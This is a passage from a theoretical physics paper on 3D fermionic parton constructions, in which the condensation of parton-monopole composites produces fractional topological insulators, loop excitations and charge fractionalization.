theory.[@mandelstam; @mt78; @Gauge_Confinement_Polyakov_1; @Gauge_Confinement_Polyakov_2; @Gauge_Confinement_Polyakov_3; @Gauge_Confinement_tHooft1; @Gauge_Confinement_tHooft2; @Gauge_Confinement_susskind; @Gauge_Confinement_Fradkin; @Gauge_Confinement_tHooft3; @Gauge_Confinement_proceedings; @susy] For an Abelian gauge theory with a compact $U(1)$ gauge group, the monopole creation operator has been constructed explicitly and gains a nonzero vacuum expectation value as shown in Ref. . Recently, it was further suggested that the behavior of the non-trivial line operators may be used to make the proper distinction between confinement phases of strongly coupled gauge theories.[@seiberg_order_2013] Note that since electric (i.e., gauge) charge excitations are linearly confined during this condensation process, the monopole condensation phase is also called the confinement phase. Unfortunately, the usual monopole condensation scenario, [@mandelstam; @mt78; @Gauge_Confinement_Polyakov_1; @Gauge_Confinement_Polyakov_2; @Gauge_Confinement_Polyakov_3; @Gauge_Confinement_tHooft1; @Gauge_Confinement_tHooft2; @Gauge_Confinement_susskind; @Gauge_Confinement_Fradkin; @Gauge_Confinement_tHooft3; @Gauge_Confinement_proceedings; @susy] when applied to the 3D parton construction, will simply confine all partons back into electrons, [resulting in]{} a non-fractionalized trivial insulator. In this sense, the parton construction with gauge confinement [driven]{} by the usual monopole condensation [does not seem to be a good pathway to reach topological states]{}. To save the parton construction approach, we should look for new scenarios of gauge confinement. More precisely, can we have a new kind of condensation that confines partons while still [leading to]{} a fractionalized insulator? How can we imagine the existence of fractionalized excitations when partons are confined? If these questions can be solved, a new systematic treatment of 3D fermionic fractionalized phases will be established. [This is the main goal of this paper, and that this is possible can be gleaned from the success of the 2D Bais-Slingerland condensation mechanism]{}.[@bais2009] Indeed, we show that there are new pathways to fractionalization in 3D, now in the [*confining regime*]{} of the gauge theory, provided that confinement occurs as the result of condensation of a class of composites made of fermionic partons and monopoles (from different sectors of the gauge group). We will see that this new form of [*oblique confinement*]{}[@Gauge_Confinement_tHooft3] leads to unexpected phases of matter, particularly states with fractionalized $\Theta$ angles and yet compatible with time-reversal invariance. [While oblique confinement as a pathway to topological phases has been considered before in the context of bosonic phases of matter,[@vonkeyserlingk2015] here we focus on topological phases of interacting fermions.]{} In addition, we also study several applications. For example, how can we impose symmetry in such a parton construction with gauge confinement? The latter leads to the notion of symmetry-enriched topological phases (SET) in the parton construction approach. [Summary of main results]{} ---------------------------- [***(1)** Composite particle theory of fermionic phases*]{}. In this article, we will consider the condensation of “composites” that not only carry magnetic charges but also contain fermionic partons that are charged under different internal gauge fields \[i.e., $U(1)\times U(1)$ strongly fluctuating gauge fields in our concrete example $c=f^1f^2f^3$\] and under the external electromagnetic (EM) field $A_\mu$. One caveat is that, despite the mixture of partons and magnetic monopoles, those condensed composites are *not* dyons. More concretely, they carry either electric charge or magnetic charge in a given gauge group, not both. This fact allows us to make reliable statements and calculations from a *local* theory. All excitations can be organized as a set of *charge-loop composites*, and, as a whole, form a *charge-loop-lattice* in which each lattice site corresponds to a deconfined excitation. Especially, partons are confined as usual but some composites constituted by partons and magnetic monopoles of $U(1)\times U(1)$ gauge fields may be deconfined and carry fractionalized EM electric charge. Many universal physical properties can be easily determined from the charge-loop-lattice, such as the braiding statistics between point-like excitations and loop excitations, the self-statistics of point-like excitations, the EM charge of the excitation, and the bulk axion $\Theta$ angle.[@witten1; @Qi2008] We will refer to this approach to constructing 3D fermionic gapped phases as a *composite particle theory*. In this theory, charge fractionalization is achieved via a Debye-H[ü]{}ckel-type charge-screening cloud formed by the composite condensates. This is analogous to the charge-screening phenomenon in the composite fermion theory of the FQH effect.[@composite_Jain_1; @composite_Jain_2; @composite_Fradkin; @composite_HLR; @composite_sm1; @cmposite_H_2; @composite_sm2] In fact, we prove that the Debye-H[ü]{}ckel-type screening is the unique source of charge fractionalization. In principle, all physical quantities of the resulting phases can be expressed as functions of a set of parameters that characterize composite particle theory. This line of thinking is also analogous to the composite fermion theory of FQH states where the filling fraction is unified in a sequence of discrete numbers, each of which corresponds to a specific ansatz in the composite fermion construction. From this perspective, the composite particle theory may be regarded as an attempt to find a 3D analog of the composite fermion theory of FQH states[, with the caveat that we are considering confined phases while in the composite fermion theory, all gauge fields are deconfined. ]{} [***(2)** Fractional topological insulators*]{}. Based on the composite particle theory, we will study two symmetry-enriched properties. The first property is the bulk axion angle $\Theta$ in the presence of time-reversal symmetry.[@witten1; @Qi2008] When $\Theta$ is non-vanishing an externally inserted EM monopole with integral magnetic charge $M$ will induce an electric polarization charge $\frac{\Theta}{2\pi}M$, a phenomenon known as the Witten effect.[@witten1; @Qi2008; @franz] For free-fermion topological insulators, the $\Theta$ angle is $\pi \text{ mod } 2\pi$ with $M\in\Z$.[@Qi2008] However, it was theoretically proposed that $\Theta$ could be different from $\pi$ if strong interactions and correlations are taken into account,[@maciejkoFTI; @maciejko_model; @maciejko2015; @swingle2011; @swingle_fti_2012] leading to the notion of 3D fractional topological insulators (FTI) with deconfined gauge fields. The periodicity of $\Theta$ should also be properly modified so as to preserve time-reversal symmetry. [In Ref. , [FTI]{}s were obtained via parton constructions where the internal gauge fields are in the Coulomb phase (photons are gapless). Therefore, a gapless channel, despite of its electric neutrality, can in principle adiabatically connect the FTIs to a fractionalized state with vanishing axion angle. In Ref. , bosonic FTIs were obtained via parton constructions where the mean-field Hamiltonian of partons explicitly breaks SU(2) gauge group down to $\Z_2$ discrete gauge group. As a result, the unbroken discrete gauge group leads to bulk topological order and deconfined fractionalized excitations. The gauge fluctuations in both Ref.  and Ref.  are perturbatively weak. In the present work, we explore the possibility of realizing FTIs via the condensation of composites (introduced above) when gauge fluctuations are sufficiently strong and gauge confinement occurs. ]{} [ In Ref.  and Ref. , each parton is assumed to carry a fractional EM electric charge such that a fractionalized $\Theta$ angle should be expected (by simply noting that the coefficient of $F\wedge F$ has unit of $e^2$). This is not the case in our work. We show that even if partons carry integral EM electric charge (i.e., both $f^1$ and $f^2$ carry $+1$ electric charge and $f^3$ carries $-1$ eletric charge, see Sec. \[sec:bec\] for more details), a fractionalized $\Theta$ and gapped bulk can also be achieved as long as a proper composite condensation is considered and partons occupy non-trivial topological insulator bands. This feature is unique in the parton construction with gauge confinement.]{} [ In the [FTI]{} state constructed in this work (Sec. \[sec\_FTI\], \[sec\_FTI\_plus\]), we show that the EM electric charge of deconfined excitations is fractionalized at $1/3$. This is consistent to the claim by Swingle, *et. al.*[@swingle2011] that an FTI necessarily has a fractionalized bulk. Indeed, the fractionalization nature of the FTI state in the present work can be traced back to the presence of $\Z_2\times \Z_6$ topological order (see Sec. \[sec\_FTI\_plus\] for more details). The latter arises from the deconfined discrete subgroup of the confined $SU(3)$ gauge group.]{} [***(3)** Charge-loop excitation symmetry and extrinsic twist defects*]{}. Noting that the set of all excitations forms a charge-loop-lattice, the second symmetry-enriched property is the concept of “charge-loop excitation symmetry”, abbreviated as $\mathsf{Charles}$ (see Definition \[dfn\_charlos\]). $\mathsf{Charles}$ can be viewed as a hidden symmetry of (3+1)D topological quantum field theories. Meanwhile, $\mathsf{Charles}$ has a geometric interpretation as a point-group symmetry of the charge-loop-lattice that preserves physical properties of the excitations. The study of $\mathsf{Charles}$ is motivated by the theory of anyonic symmetry [@Teo2015; @Teo2014; @ran; @barkeshli_wen; @Teo2013; @Barkeshli2014; @You2012; @genon_1; @genon_2; @genon_3; @genon_4; @Bombin2010] and its relation to extrinsic twist defects of 2D Abelian topological phases. We expect that 3D Abelian topological phases where charge-loop composite excitations are allowed may host even more exotic physics if extrinsic defects are considered. Physically, extrinsic defects (which may come in the form of vortices or disclinations, for example) are semi-classical objects that are externally imposed into a 2D topological phase. An extrinsic *twist* defect is one which may be associated with an element of an anyonic symmetry group that acts to permute the set of anyons. The inclusion of such defects enriches the tensor category theory of the Abelian parent topological phase. Indeed, this line of thinking has attracted a lot of attention since extrinsic twist defects can bind non-Abelian objects even though all of excitations of the parent topological phase without defects are Abelian.[@genon_1; @genon_2; @Bombin2010; @genon_3; @genon_4; @You2012] A typical example is found in some lattice systems exhibiting $\mathbb{Z}_N$ topological order that contain, for example, the $\Z_N$ charge and flux anyons $e$ and $m$.[@Bombin2010; @You2012] In these cases the anyonic symmetry is intertwined with a lattice translation symmetry such that a dislocation defect acts to exchange the $e$ particle-type with the $m$ particle-type when they orbit around the defect. This implies that the defect harbors a rich internal (non-Abelian) structure so that it can convert between the anyon types. In the present work we propose $\mathsf{Charles}$ as a 3D version of anyonic symmetry in 2D. In analogy to 2D, each extrinsic defect in 3D is also associated with a $\mathsf{Charles}$ group element. We also study defect species and some defect fusion properties (see Fig. \[figure\_defect\_composite\]). The remainder of the paper is organized as follows. Sec. \[sec:gauge\_strc\] is devoted to a general discussion of the parton construction and composite condensation. In Sec. \[sec:theta\], [FTI]{}s are constructed from a composite condensation phase where all of the partons occupy topological insulator bands. A concrete example with time-reversal symmetry and fractional $\Theta=\frac{\pi}{9}\text{ mod }\frac{2}{9}\pi$ is shown (see Fig. \[figure\_theta\], Sec. \[sec:theta\]). As a comparison, we also show a parton construction in the Coulomb (gapless photon) phase using a perturbative approach, which leads to $\Theta=\pi\text{ mod }2\pi$ and two gapless neutral modes in the bulk. In Sec. \[sec:charlos\_defect\_symmetry\], the charge-loop excitation symmetry ($\mathsf{Charles}$) of the charge-loop excitations, and its relation to 3D extrinsic defects, is studied. Sec. \[sec:conclusion\_direction\] is devoted to the conclusion and future directions. Many key notations, mathematical formulae, and terminologies are introduced in Sec. \[sec:gauge\_strc\], which provides the preliminaries for the subsequent parts. Several technical details can be found in the Appendices. In Appendix \[appendix:notation\], several notations and abbreviations are collected. Composite particle theory in three dimensions: A general discussion {#sec:gauge_strc} =================================================================== Compact $U(1)\times U(1)\times U(1)$ gauge symmetry of composites {#sec:bec} ----------------------------------------------------------------- ![(Color online) Parton construction of electron operators in the present work. The wavy lines denote interactions mediated by gauge bosons. $A_\mu$ is the external non-dynamical EM (electromagnetic) field, serving as a probe of the electromagnetic response of the system. $a_\mu$ and $b_\mu$ are two dynamical, compact $U(1)$ gauge fields, belonging to the $U(1)_a$ and $U(1)_b$ gauge groups respectively. The partons $f^1$ and $f^2$ carry $1$ and $-1$ gauge charges of the $U(1)_a$ gauge group respectively. The partons $f^3$ and $f^2$ carry $1$ and $-1$ gauge charges of the $U(1)_b$ gauge group respectively. The EM electric charges carried by the partons $f^1$, $f^2$, $f^3$ are $e$, $e$, $-e$, respectively.[]{data-label="figure_newelectron"}](figure_newelectron.pdf){width="8.5cm"} In the simplest fermionic parton construction, the electron operator is decomposed into three fermionic partons: $c=f^1f^2f^3$ (Fig. \[figure\_newelectron\]), where both $f^1$ and $f^2$ carry unit EM charge $e$ while $f^3$ carries $-e$. As a result, the electron carries $e$. In a 3D mean-field theory where the partons are deconfined, we consider that all fermionic partons have a gapped spectrum and form either a trivial band insulator ($\theta=0$) or a strong topological insulator ($\theta=\pi$) simultaneously, where $\theta$ denotes the axion angle of the partons [@witten1; @Qi2008]. To avoid confusion, we will use the capital letter $\Theta$ to denote the axion angle of the electron, which will be calculated in detail in Sec. \[sec:theta\]. The internal gauge group is $SU(3)$ whose maximal torus (maximal commuting subgroup) $U(1)_a\times U(1)_b$ is sufficient to capture the confinement phase properties due to the ’t Hooft gauge projection [@Gauge_Confinement_tHooft3]. Here, both $U(1)$ factors are compact gauge groups that support magnetic monopoles [@Gauge_Confinement_tHooft3]. $U(1)_a$ corresponds to the gauge field $a_\mu$ that glues $f^1$ and $f^2$ together, while $U(1)_b$ corresponds to the gauge field $b_\mu$ that glues $f^2$ and $f^3$ together (Fig. \[figure\_newelectron\]). Adding the EM gauge group with gauge field $A_\mu$, the total gauge group is given by $U(1)_a\times U(1)_b\times U(1)_{\rm EM}$. It should be noted that $A_\mu$ is a non-dynamical (i.e., background) gauge field, which is useful for diagnosing the EM linear response properties of the resulting phases. For the same reason, we consider monopole configurations of $A_\mu$ (with magnetic charge $M$) as externally imposed background configurations. Alternatively, one may also define the following three gauge fields: $$\begin{aligned} A^{f1}_\mu=a_\mu+A_\mu , A^{f2}_\mu=-a_\mu-b_\mu+A_\mu , A^{f3}_\mu=b_\mu-A_\mu\,,\nonumber \end{aligned}$$ where $A^{fi}$ is the gauge field that only couples to $f^i$ ($i=1,2,3$). The relation between the two sets of gauge fields can be expressed in matrix form: $$\begin{aligned} \left(\begin{matrix} A_\mu\\ a_\mu\\ b_\mu\end{matrix}\right)=\left(\begin{matrix} 1&1&1\\ 0&-1&-1\\ 1&1&2 \end{matrix}\right) \left(\begin{matrix} A_\mu^{f1}\\ A_\mu^{f2}\\ A_\mu^{f3} \end{matrix}\right)\,,\label{transtion_matrix_gauge}\end{aligned}$$ where the matrix is integer-valued and invertible, i.e., belongs to the $\mathbb{GL}(3,\Z)$ group. We now turn to the description of generic composite particles, which are labeled by a set of electric charges and magnetic charges. We use $N_{a,b}$ to denote the electric charge of the $U(1)_{a,b}$ gauge group and $N_m^{a,b}$ to denote the magnetic charge of that same gauge group. We use $N_A$ and $M$ to denote the bare electric and magnetic charges in the EM gauge group, and $N^{fi}$ and $N^{fi}_m$ to denote the electric and magnetic charges of the $U(1)_{fi}$ gauge groups. Due to Eq. (\[transtion\_matrix\_gauge\]), the magnetic charges transform as: $$\begin{aligned} &N^{f1}_m=N^a_m+ M, N^{f2}_m=-N^a_m-N^b_m+M, \nonumber\\ &N^{f3}_m=N^b_m-M,\nonumber\end{aligned}$$ and electric charges transform as $$\begin{aligned} &N_A=N^{f1}+N^{f2}-N^{f3}, N_a=N^{f1}-N^{f2}, \nonumber\\ &N_b=N^{f3}-N^{f2}.\nonumber \end{aligned}$$ For convenience, we can easily derive the following useful formulae: $$\begin{aligned} &M=N^{f1}_m+N^{f2}_m+N^{f3}_m, N^a_m=-N^{f2}_m-N^{f3}_m,\nonumber\\ &N^b_m=N^{f1}_m+N^{f2}_m+2N^{f3}_m.\nonumber\end{aligned}$$ To summarize, a composite particle can be uniquely labeled by six numbers (three electric charges and three magnetic charges). The above relations can be recast in matrix form, $$\begin{aligned} &\left(\begin{matrix} N_A\\ N_a\\ N_b \end{matrix}\right)=\left(\begin{matrix} 1&1&-1\\ 1&-1&0\\ 0&-1&1\\ \end{matrix}\right) \left(\begin{matrix} N^{f1}\\ N^{f2}\\ N^{f3} \end{matrix}\right)\,,\label{eqn:transition_matrix} \\ &\left(\begin{matrix} M\\ N_m^a\\ N_m^b \end{matrix}\right)=\left(\begin{matrix} 1&1&1\\ 0&-1&-1\\ 1&1&2 \end{matrix}\right) \left(\begin{matrix} N^{f1}_m\\ N^{f2}_m\\ N^{f3}_m \end{matrix}\right)\,,\label{eqn:transition_matrix1}\end{aligned}$$ where the two matrices belong to the $\mathbb{GL}(3,\Z)$ group. All magnetic charges take values in an integral domain, i.e., $M$, $N_m^a$, $N_m^b$, $N_m^{fi}\in\Z$, where $i=1,2,3$. However, we will soon see that this integral domain will be potentially restricted to a smaller domain if we only consider the deconfined *excitations* in the presence of a composite condensate. We will introduce the notion of excitations in Sec. \[section\_of\_screen\]. By the bare electric charge, we mean that $N_A$ is a naive count of the EM electric charge. In Sec. \[section\_of\_screen\], it will be shown that composite condensates will partially screen the charge, leading to a *net* EM electric charge $Q$ to be defined in Eq. (\[NE1\]). The electric charges $N^{fi}$ ($i=1,2,3$) are related to the number of attached fermions via the Witten effect formula: $$\begin{aligned} &N^{fi}=n^{fi}+\frac{\theta}{2\pi}N^{fi}_m\,,\,\text{with }n^{fi}\in\Z\,.\label{Nnf1}\end{aligned}$$ The integer $n^{fi}$ counts the total number of fermions $f^i$ in the composite, and $\theta$ is determined by the $\mathbb{Z}_2$ index of a 3D time-reversal invariant topological insulator. If $\theta=0$, the partons occupy a trivial band structure; if $\theta=\pi$, the partons occupy a non-trivial topological insulator band structure. The defining domains of $N^{f1,f2,f3},N_a,N_b,N_A$ can be either integer or potentially half-integer, depending on $\theta$. ![(Color online) Schematic representation of composite particle condensation. Before condensation, the system is an electromagnetic plasma of composites in the $U(1)_\textrm{EM}\times U(1)_a\times U(1)_b$ gauge group. There are many composite particles (denoted by solid circles) including $\varphi_1$ and $\varphi_2$. There are also two gapless photons (denoted by $a$ and $b$ in the figure), indicating that the phase before condensation is a gapless Coulomb phase for both internal dynamical gauge fields. After condensing $\varphi_1$ and $\varphi_2$, the system enters a gapped phase in the absence of photons. All composites (denoted by black solid circles on the left) that have nonzero mutual statistics with both $\varphi_1$ and $\varphi_2$ are confined. Otherwise, those composites that have trivial (zero) mutual statistics with both condensates survive as excitations (denoted by blue solid circles) of the gapped phase. The red loops on the right represent loop excitations due to the two condensates.[]{data-label="figure_condensation"}](figure_condensation.pdf){width="8.5cm"} A local field theoretic description of condensed composites ----------------------------------------------------------- Since there are two internal gauge fields with strong gauge fluctuations, we can consider two linearly independent Bose condensates denoted by $\varphi_1$ and $\varphi_2$, as shown in Fig. \[figure\_condensation\]. Both condensates should contain magnetic monopoles of the internal gauge fields but be neutral under both the $U(1)_a$ and $U(1)_b$ gauge groups, i.e., $N_a=0\,,N_b=0$. Since the EM gauge field is treated as a background gauge field for the purpose of the EM response, the condensates should not carry $M$. Otherwise, the EM gauge field must be strongly fluctuating, which is not our working assumption. In summary, the electric and magnetic charges of $\varphi_1$ and $\varphi_2$ can be completely determined by six parameters $(q,u,v,q',u',v')$ in Table \[table:em\]. Since the condensates are not dyonic in each gauge group the order parameters $\langle \varphi_1\rangle$ and $\langle \varphi_2\rangle$ are local to each other and can be described by an effective local quantum field theory. More concretely, we may start with a phenomenological Ginzburg-Landau-type action in 4D Euclidean spacetime: $$\begin{aligned} \! \! \! \!\! S_{\rm GL}\!=\!\int \!d^4x \sum^2_I\!\left(|\hat{D}_\mu\varphi_I |^2+\mu^2 |\varphi_I|^2\! +\! \lambda |\varphi_I|^4\right)+ \!S_M,\label{equation_free_energy}\end{aligned}$$ where the Ginzburg-Landau parameter $\lambda$ is positive. $\hat{D}_\mu$ is the covariant derivative defined by: $$\begin{aligned} \hat{D}_\mu\equiv \partial_\mu+i N_A A_\mu+i N_m^a\tilde{a}_\mu+i N_m^b \tilde{b}_\mu.\end{aligned}$$ Here, $N_A,N^a_m,N^b_m$ are two sets of electric/magnetic charges of $\varphi_1$ and $\varphi_2$, which can be found in Table \[table:em\]. The one-form gauge fields $\tilde{a}_\mu$ and $\tilde{b}_\mu$ serve as the magnetic dual of the gauge fields $a_\mu$ and $b_\mu$, respectively. For example, $\tilde{a}_\mu$ is introduced such that its gauge charge is carried by magnetic monopoles of the $U(1)_a$ gauge group. Meanwhile, the magnetic flux of $\tilde{a}_\mu$ gives the electric field $\mathbf{E}^a$, namely, $\mathbf{E}^a=\nabla\times \mathbf{\tilde{a}}$. $\tilde{b}_\mu$ can be understood analogously to $\tilde{a}_\mu$. $S_M$ includes the Maxwell terms: $S_M=\int d^4x(\frac{1}{4}\tilde{f}^a_{\mu\nu}\tilde{f}^a_{\mu\nu}+\frac{1}{4}\tilde{f}^b_{\mu\nu}\tilde{f}^b_{\mu\nu})\,.$ In the condensed phase where the mass parameter $\mu^2<0$, nonzero expectation values $\langle\varphi_I\rangle\neq0$ develop. Here, $\tilde{f}^{a,b}_{\mu\nu}$ are the field strength tensors of $\tilde{a}_\mu$ and $\tilde{b}_\mu$. One advantage to using dual gauge fields is that the problem of strong gauge fluctuations ($g_a\gg 1\,,g_b\gg 1$) of the $a_\mu$ and $b_\mu$ gauge fields is transformed into the problem of weak gauge fluctuations of the dual gauge fields $\tilde{a}_\mu$ and $\tilde{b}_\mu$ by noting that the coupling constants between magnetic charges and dual gauge fields is the inverse of the original coupling constants, i.e., $1/g_{a,b}$. It is noteworthy that the six numbers $(u,v,u',v',q,q')$ describing the condensates are not completely free since the following three conditions should be satisfied: 1. $\varphi_1$ and $\varphi_2$ are bosonic;\[condition\_phi2\] 2. $\varphi_1$ and $\varphi_2$ are allowed to condense simultaneously;\[condition\_phi3\] 3. $\varphi_1$ and $\varphi_2$ are linearly independent;\[condition\_phi1\] such that the composite condensates $\varphi_1$ and $\varphi_2$ are physically viable. In more detail, according to the domains of definition of every charge (e.g., all magnetic charges are integer-valued, all $n^{fi}$ are integer-valued), we can deduce the domains of the six numbers (see Table \[table:em\]): $$\begin{aligned} &u\,,v\,,u'\,,v'\,,q-\frac{\theta}{2\pi}u \,, q+\frac{\theta}{2\pi}(u+v) \,,q-\frac{\theta}{2\pi}v \in\Z,\label{constr_1plus}\\ & q'-\frac{\theta}{2\pi}u' \,,q'+\frac{\theta}{2\pi}(u'+v')\, ,q'-\frac{\theta}{2\pi}v' \in\Z\,.\label{constr_1}\end{aligned}$$ Since only bosonic particles can undergo Bose condensation, one should carefully check the self-statistics of $\varphi_1$ and $\varphi_2$. Furthermore, the mutual statistics between $\varphi_1$ and $\varphi_2$ must be zero so that they are allowed to condense simultaneously. Let us first consider the latter. The trivial mutual statistics between two composites (with and without prime) is given by the following equation: $$\begin{aligned} \sum^3_{i}(N^{fi}_m{n^{fi}}'-{N^{fi}_m}'n^{fi})=0\label{equation:mutual_stat}\end{aligned}$$ or equivalently: $\sum^3_{i}(N^{fi}_m{N^{fi}}'-{N^{fi}_m}'N^{fi})=0\,.$ If this equation is satisfied, then the two composites can condense simultaneously. Furthermore, condensation of one of the composites will lead to deconfined particles (an excitation spectrum) having electric and magnetic charges are determined by this equation. If the equation is not satisfied, the condensation of one of the composites will confine the other [@cardy1; @cardy2]. Inserting the electric and magnetic charges of $\varphi_1,\varphi_2$ into the equation, it turns out that $\varphi_1$ and $\varphi_2$ always satisfy the condition of trivial mutual statistics. Next, we need to further check the self-statistics of $\varphi_1$ and $\varphi_2$. For a generic composite, the self-statistics phase $e^{i\pi \Gamma}$ is determined by the following integer: $$\begin{aligned} \Gamma=\sum_i^3 (N_m^{fi}n^{fi}+n^{fi})\,,\label{eq:quantum_stat}\end{aligned}$$ where the second term $n^{fi}$ counts the number of fermionic partons inside the composite. The first term $N_m^{fi}n^{fi}$ arises from the angular momentum of the relative motion between the electric charge and magnetic charge. Note that the polarization charge “$\frac{\theta}{2\pi}N^{fi}_{m}$” due to the Witten effect in Eq. (\[Nnf1\]) does not enter the statistics. A field theoretic understanding of this phenomenon can be found in Ref. . For later convenience, we may express Eq. (\[eq:quantum\_stat\]) in terms of the $U(1)_{\rm EM}\times U(1)_a\times U(1)_b$ gauge groups: $$\begin{aligned} \Gamma=&N^a_m(n^{f1}-n^{f2})+N^b_m (n^{f3}-n^{f2})\nonumber\\ &+(M+1)(n^{f1}+n^{f2}-n^{f3})\,,\label{eq:stat123}\end{aligned}$$ where we have added even integers during the derivation as only the value of $\Gamma$ mod $2$ is meaningful. If $\Gamma$ is even, the composite is bosonic; otherwise, it is fermionic. After inserting the values of the electric and magnetic charges of $\varphi_1$ and $\varphi_2$ into $\Gamma$, we may obtain the $\Gamma$ formulae of both $\varphi_1$ and $\varphi_2$ (denoted as $\Gamma(\varphi_1),\Gamma(\varphi_2)$) as functions of $u,v,u',v',q,q'$ (see Appendix \[appendix\_bosonic\]). The requirement that both $\varphi_1$ and $\varphi_2$ are bosonic leads to the following constraints on $u,v,u',v',q,q'$: $$\begin{aligned} &\Gamma(\varphi_1)\in\Z_{\rm even}\,,\,~~\Gamma(\varphi_2)\in\Z_{\rm even}\,.\label{constr_3}\end{aligned}$$ So far, we have deduced several constraints on the six numbers: Eqs. (\[constr\_1plus\],\[constr\_1\],\[constr\_3\]), but there is one more constraint, i.e., Eq. (\[constr\_5\]), which enforces that $\varphi_1$ and $\varphi_2$ are linearly independent. It is possible that one of the composites consists of several copies of the other composite, in which case there is actually only one condensate. To avoid this situation, the following condition should be strictly imposed: $$\begin{aligned} uv'-u'v\neq 0\,.\label{constr_5} \end{aligned}$$ A physical understanding of this condition will be presented in Sec. \[sec:loop\_loop\]. For convenience, we introduce the following notation: $$\begin{aligned} &K=\bpm u & v \\ u'& v'\epm,~~ \mathbf{N}_m=\bpm N_m^a\\N_m^b\epm,~~ \mathbf{q}=\bpm q\\q'\epm,\label{define_KNq1} \\ &\mathbf{\Phi}_e=\bpm \Phi^a_e\\ \Phi^b_e\epm, ~~\mathbf{N}_e=\bpm N_a\\N_b\epm. \label{define_KNq}\end{aligned}$$ Then, the matrix $K$ is invertible, namely, its determinant should be nonzero, as given by Eq. (\[constr\_5\]). In summary, the conditions Eqs. (\[constr\_1plus\],\[constr\_1\],\[constr\_3\],\[constr\_5\]) should be imposed on the six integers $u,v,q;u',v',q'$ such that the two condensates satisfy conditions: (\[condition\_phi2\],\[condition\_phi3\],\[condition\_phi1\]). Generalized flux quantization and loop excitations {#sec:loop_loop} -------------------------------------------------- In order to gain a better physical understanding of the condition (\[constr\_5\]), we need to carefully study the “generalized flux quantization” induced by the two condensates $\varphi_1$ and $\varphi_2$ whose electric and magnetic charges are listed in Table \[table:em\]. In a usual type-II superconductor, we know that the EM magnetic flux denoted by $\Phi^A_M$ is screened and quantized according to $2\Phi^A_M/2\pi=\Phi^A_M/\pi\in\Z$ since the Cooper pair condensate carries $2e$ EM electric charge. In our case, the two condensates $\varphi_1$ and $\varphi_2$ carry not only EM electric charges but also magnetic charges of the $a$ and $b$ gauge groups as shown in Table \[table:em\]. As a result, we have the following generalized flux quantization conditions: $$\begin{aligned} & q\Phi^A_M+u\Phi^a_e+v\Phi^b_e=2\pi\ell,\label{EM1}\\ &q'{\Phi^A_M}+u'{\Phi^a_e}+v'{\Phi^b_e}=2\pi\ell',\!\label{EM1+}\end{aligned}$$ where $\Phi^A_M$ is the EM magnetic flux piercing a spatial loop $\mathcal{S}^1$. $\Phi^a_e$ and $\Phi^b_e$ are the $a$- and $b$-electric fluxes piercing $\mathcal{S}^1$, respectively. Here, instead of magnetic fluxes, electric fluxes of the $U(1)_a\times U(1)_b$ gauge group are involved since the condensates carry magnetic charges rather than electric charges of the $U(1)_a\times U(1)_b$ gauge group. $\ell,\ell'\in\Z$ label the winding numbers of the mapping $\mathcal{S}^1\rightarrow U(1)$ of the condensate order parameters $\varphi_1,\varphi_2$. In contrast with fluxes of the internal gauge groups, arbitrary values of $\Phi^A_M$ are allowed to be inserted. In other words, $A_\mu$ itself is not higgsed, and the EM electric charge of the electrons is a well-defined quantum number. This implies that the two condensates must provide a new charge screening mechanism such that the net EM electric charge of each condensate is zero, although both condensates carry a nonzero bare EM electric charge ($N_A=q,q'$). This screening effect can lead to fractionalization of the charge of excitations, even in the absence of an external EM magnetic charge. We will postpone a discussion of this issue until Sec. \[section\_of\_screen\]. Since $A_\mu$ is an external non-dynamical field, we may temporarily turn it off in Eqs. (\[EM1\],\[EM1+\]) to find: $$\begin{aligned} & u\Phi^a_e+v\Phi^b_e=2\pi \ell\,, \,u'{\Phi^a_e}+v'{\Phi^b_e}=2\pi \ell'\,.\label{phie1}\end{aligned}$$ A generic solution of Eq. (\[phie1\]) is given by: $$\begin{aligned} &\Phi^a_e=2\pi\frac{\ell v'-\ell'v}{\mathsf{Det}K}\,,\,\Phi^b_e=2\pi\frac{\ell'u-\ell u'}{\mathsf{Det}K}\,.\label{phi_ae} \end{aligned}$$ Here, $u,v,u',v'\in\Z$ satisfy the condition (\[constr\_5\]). By noting that $\ell v'-\ell'v$ is divisible by the greatest common divisor ${\mathsf{GCD}}(v,v')$ and $\ell'u-\ell u'$ is divisible by the greatest common divisor $\mathsf{GCD}(u,u')$, one can use [Bézout’s lemma]{} (see Appendix \[appendix\_proof\_theorem\_flux\]) to obtain the minimal quantized electric fluxes: $$\begin{aligned} \!\!\!\!(\Phi^a_e)_{\rm min}\!=\!2\pi\!\bigg|\frac{ \mathsf{GCD}(v,v')}{ \mathsf{Det}K}\bigg|, (\Phi^b_e)_{\rm min}\!=\!2\pi\!\bigg|\frac{ \mathsf{GCD}(u,u')}{ \mathsf{Det}K}\bigg|.\!\label{discreteflux1} \end{aligned}$$ Since $| uv'-u'v|$ is divisible by both $\mathsf{GCD}(v,v')$ and $\mathsf{GCD}(u,u')$, we have the following two useful inequalities: $$\begin{aligned} \!\!\!\!\!|uv'-u'v|\!\geq\!|\mathsf{GCD}(u,u')|\,, |uv'-u'v|\!\geq\!|\mathsf{GCD}(v,v')|.\label{eq:ineq}\end{aligned}$$ Based on Bézout’s lemma, we can easily prove the following theorem. The proof is shown in Appendix \[appendix\_proof\_theorem\_flux\]: $(\Phi^a_e)_{\rm min}=2\pi$ and $(\Phi^b_e)_{\rm min}=2\pi$ if and only if $|uv'-u'v|=1$.\[theorem\_flux\] The above theorem leads to the following criterion for loop/flux excitations: \[Criterion for loop excitations\] If $|\mathsf{Det}K|=1$, the bulk has no deconfined discrete gauge fluxes (therefore, no detectable loop excitations); If $|\mathsf{Det}K|>1$, the bulk has deconfined discrete gauge fluxes (therefore, detectable loop excitations with minimal flux strength smaller than $2\pi$.)\[crt\_loop\_exc\] The solutions $(\Phi_e^a, \Phi_e^b)$ in Eq. (\[phi\_ae\]) can be recast in the following form: $$\begin{aligned} \mathbf{\Phi}_e=2\pi K^{-1}\mathbf{L} \,,\label{eq:phie_L}\end{aligned}$$ where the integer vector $\mathbf{L}=(\ell,\ell')^T$. Thus, we may define a 2D loop-lattice generated by a dimensionless integer vector $\mathbf{L}$: \[[Loop-lattice]{}\] A loop-lattice is a 2D square lattice where each site corresponds to a loop excitation labeled by $\mathbf{L}=(\ell,\ell')^T$. The corresponding electric flux strength $\mathbf{\Phi}_e$ of each site is determined by Eq. (\[eq:phie\_L\]).\[dfn\_loops\] Point-particle excitations and charge fractionalization {#section_of_screen} ------------------------------------------------------- In addition to loop excitations, we also have point-particle excitations: \[[Excitation]{} and [Charge lattice]{}\] Excitations are defined as deconfined particles that have trivial mutual statistics with both condensates. All excitations form a 4D charge lattice which is a sublattice of the original 6D lattice. Unless otherwise specified, excitations always refer to point-particle excitations.\[dfn\_excitation\] By definition, all excitations 